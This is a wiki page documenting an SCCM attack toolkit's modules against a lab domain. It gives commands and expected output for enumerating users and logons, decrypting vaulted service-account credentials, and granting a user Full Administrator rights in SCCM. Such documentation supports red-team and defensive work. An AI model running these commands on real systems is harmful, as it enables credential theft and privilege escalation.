Skip to content

7. SCCM Modules

Jump to bottom
Sanjiv Kawa edited this page Jul 2, 2024 · 1 revision

SCCM modules are effective when you are able to interact with an SCCM server that has exposes the Microsoft SQL database, either locally or remotely.

SCCM modules support impersonation, with the exception of DecryptCredentials. An example has been provided in the "Users" section below.

Users

SQLRecon.exe /auth:WinToken /i:sa /host:MECM01 /database:CM_KAW /module:users

Expected output:

[*] High-Level SCCM User Listing:

| LogonName             | AdminID  | SourceSite | DistinguishedName                             |
| --------------------- | -------- | ---------- | --------------------------------------------- |
| KAWALABS\mssccm_svc   | 16777217 | KAW        |                                               |
| KAWALABS\SCCM Support | 16777218 | KAW        | CN=SCCM Support,CN=Users,DC=kawalabs,DC=local |
| KAWALABS\JSmith       | 16777229 | KAW        |                                               |
| KAWALABS\ACon         | 16777230 | KAW        |                                               |


[*] Detailed Permissions:

| LogonName             | RoleName                |
| --------------------- | ----------------------- |
| KAWALABS\mssccm_svc   | Full Administrator      |
| KAWALABS\SCCM Support | Read-only Analyst       |
| KAWALABS\SCCM Support | Remote Tools Operator   |
| KAWALABS\SCCM Support | Software Update Manager |
| KAWALABS\JSmith       | Full Administrator      |
| KAWALABS\ACon         | Full Administrator      |

Sites

SQLRecon.exe /auth:WinToken /host:MECM01 /database:CM_KAW /module:sites

Expected output:

| ServerName            | SiteCode | AccessType | ADSiteName              | IPSubnets   | IsProtected | IPv6Prefixes | ServerRemoteName      | IsDP | IsSMP |
| --------------------- | -------- | ---------- | ----------------------- | ----------- | ----------- | ------------ | --------------------- | ---- | ----- |
| MECM01.KAWALABS.LOCAL | KAW      | 0          | Default-First-Site-Name | 172.16.10.0 | 0           |              | MECM01.kawalabs.local | True | False |

Logons

SQLRecon.exe /auth:WinToken /host:MECM01 /database:CM_KAW /module:logons

Expected output:

| IP_Addr | Host | User |
-----------------------
| 172.16.10.110 | DESKTOP-LF8Q3C6 | KAWALABS\jsmith |
| 172.16.10.103 | MECM01 | KAWALABS\jsmith |
| 172.16.10.102 | SQL02| KAWALABS\admin |

TaskList

SQLRecon.exe /auth:WinToken /host:MECM01 /database:CM_KAW /module:tasklist

Expected output:

| PkgID    | Name                     |
| -------- | ------------------------ |
| KAW00005 | Install CrowdStrike      |
| KAW00006 | Install Cisco Anyconnect |
| KAW00007 | Install MFA Soft Token   |

TaskData

SQLRecon.exe /auth:WinToken /host:MECM01 /database:CM_KAW /module:taskdata

Expected output:

[*] Gathered encrypted task sequence blob.
 |-> Task Sequence ID: KAW00005
 |-> Task Sequence Name: Install CrowdStrike
 |-> Attempting to decrypt task data:

<sequence version="3.10"/>
 
[*] Gathered encrypted task sequence blob.
 |-> Task Sequence ID: KAW00006
 |-> Task Sequence Name: Install Cisco Anyconnect
 |-> Attempting to decrypt task data:

<sequence version="3.10"/>
 
[*] Gathered encrypted task sequence blob.
 |-> Task Sequence ID: KAW00007
 |-> Task Sequence Name: Install MFA Soft Token
 |-> Attempting to decrypt task data:

<sequence version="3.10"/>

Credentials

SQLRecon.exe /auth:WinToken /host:MECM01 /database:CM_KAW /module:credentials

Expected output:

| UserName            | Usage                                                                           |
| ------------------- | ------------------------------------------------------------------------------- |
| KAWALABS\mssccm_svc | <AccountUsages><UsageName>SMS_CLIENT_CONFIG_MANAGER</UsageName></AccountUsages> |

DecryptCredentials

SQLRecon.exe /auth:WinToken /host:MECM01 /database:CM_KAW /module:decryptcredentials

Expected output:

[*] Identified vaulted SCCM credential:
 |-> Username: KAWALABS\mssccm_svc
 |-> Password: Password123
 |-> Function: SMS_CLIENT_CONFIG_MANAGER

AddAdmin - Current User

SQLRecon.exe /auth:WinDomain /d: KAWALABS /u:admin /p:Password123 /host:MECM01 /database:CM_KAW /module:addadmin /user:current /sid:current

Expected output:

[+] SUCCESS: Added target user to RBAC_Admins table.
[*] Use the this command to remove the account: "/database:cm_kaw /module:sRemoveAdmin /user:16777223 /remove:00000000|00000000"
[+] SUCCESS: Assigned permissions to 'KAWALABS\JSmith'. The user should now be a 'Full Administrator' in SCCM.

AddAdmin - Custom User

SQLRecon.exe /auth:WinToken /host:MECM01 /database:CM_KAW /module:addadmin /user:KAWALABS\acon /sid:S-1-5-21-3113994310-608060616-2731373765-1391

Expected output:

SUCCESS: Added target user to RBAC_Admins table.
[*] Use the this command to remove the account: "/database:cm_kaw /module:sRemoveAdmin /user:16777224 /remove:00000000|00000000"
[+] SUCCESS: Asigned permissions to 'KAWALABS\acon'. The user should now be a 'Full Administrator' in SCCM.

RemoveAdmin

SQLRecon.exe /a:windomain /d:kawalabs /u:admin /p:Password123 /database:CM_KAW /m:RemoveAdmin /user:16777224 /remove:"00000000|00000000"

Expected output:

[+] SUCCESS: Removed privileges from 16777224.
[+] SUCCESS: Removed user with AdminID of '16777224' from the 'RBAC_Admins' table.
[+] SUCCESS: All cleanup actions completed.
Clone this wiki locally